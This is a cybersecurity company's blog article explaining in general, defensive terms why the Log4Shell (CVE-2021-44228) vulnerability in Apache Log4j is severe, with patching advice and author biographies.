Why is Apache Log4j vulnerability so serious?
Author: Nyan Tun Zaw, VP, Athena Dynamics
Advisory Editor: Ken Soh, CEO, Athena Dynamics
Up until last week, a lot of us probably wouldn’t be aware of what is Log4j and whether we have them in our systems. With the discovery of CVE-2021-44228 (also known as Log4Shell) by a researcher from Alibaba Cloud Security Team, Chen Zhaojun, it has now become a nightmare for IT / enterprise security teams / product vendors all over the world, the majority of which has been using Log4j in one way or another.
Apache Log4j is a logging library that is widely used in java-based applications all over the world. With the popularity of Java language used in various products and solutions, the range of exposure caused by this vulnerability is extremely broad. Every application has some form of logging mechanisms in order for the developers to understand how users are interacting with it, whether there are any problems, bugs, etc., which can then be used for troubleshooting purposes. This means majority of the Java applications would have been using this library for logging purposes.
From security point of view, the reason why Log4j’s impact is so huge (with CVSS score 10 out of 10 for CVE-2021-44228) was due to a few key reasons:
- The sheer volume of affected systems and products all over the world
Major global entities like Amazon Web Services, Google Cloud, Broadcom, Cisco were all reported to have been affected
- Being a remote code execution vulnerability
RCEs are always one of the worst to have because it allows malicious attackers to run any code on the affected PC/server and access everything in the file system, meaning that malicious attackers can make use of this for any purpose that suits their needs (e.g. to deliver ransomware, spyware, APT, cryptominers, etc.,)
- The easiness for malicious attackers to exploit this vulnerability
To exploit this, the attacker just needs to craft a specific string of code and get the system to log it (e.g. sending this string of code in login forms, contact us forms, changing username into this string, etc.,)
It has already been reported that various APT groups and cybercriminals are trying to take advantage of the fact that everyone is still rushing to fix this and delivering their malwares via this exploit. With that, it is highly recommended for everyone to stay vigilant and make sure all the systems being used are patched from this vulnerabilities (all the major vendors have been rushing to push out the patches) and if unsure, do check with your product vendor ASAP to avoid any potential effect on your system.
As always, it is good to perform Vulnerability Assessment and Penetration Testing (VAPT) or compromise assessment in your systems afterwards to make sure that everything is patched and there are no lurking APTs still remaining in your network – either via traditional human-based penetration testing or robotic penetration testing tools. We have also written about some quick differences between the two approaches here.
Please do reach out to us if you would like to find out more on how you can improve your cybersecurity posture.
Disclaimer: The opinions and outcome of best practices introduced in this material may vary due to environmental and contextual parameters. Neither BH Global Corporation Ltd, Athena Dynamics Pte Ltd nor the writers is responsible for any direct or indirect implications/impacts to the readers due to the adoption of these practices
Nyan Tun Zaw is the VP of Business Development at Athena Dynamics Pte Ltd, which is a subsidiary of BH Global Corporation Ltd, an SGX mainboard listed company.
With a wide range of background in cybersecurity, software development, web development as well as networking, Zaw has in-depth experiences in deploying security solutions for several highly confidential government and critical infrastructure projects, particularly in the CDR/CDNR field as a technical lead. His interest mainly lies in Cybersecurity and AIML.
Zaw holds a Bachelor of Business Management, with double majors in Finance and Information Systems, from Singapore Management University as well as Master of Business Administration (MBA) from Quantic School of Business and Technology. He is also a holder of the Certified Ethical Hacker (CEH) and EC-council Certified Security Analyst (ECSA) certificates.
Being a technical person who also likes sharing his experiences and knowledge, Zaw has also been part of a speaking panels with global C-level executives at various events and conferences in the region.
Contact: [email protected]
Ken Soh holds concurrent appoints as Group CIO of mainboard listed BH Global Corporation Limited since 3 Mar 2014 and as the founding CEO of the group subsidiary cyber security company Athena Dynamics Pte Ltd.
Ken has more than 25 years of working experience in the ICT industry. Prior to joining BH Global, Ken held various senior positions in public and private sectors at CxO and business leader levels with Master Planning and P&L responsibilities.
Ken has been an avid industry speaker and writer. He holds a Master of Science in Computer Studies from the University of Essex; and a Master of Business Administration (eMBA) from the Nanyang Business School (a Nanyang Technological University and University of California, Berkeley joint programme).
More information of Ken’s past industry and media sharing is available via this link.
Contact: [email protected]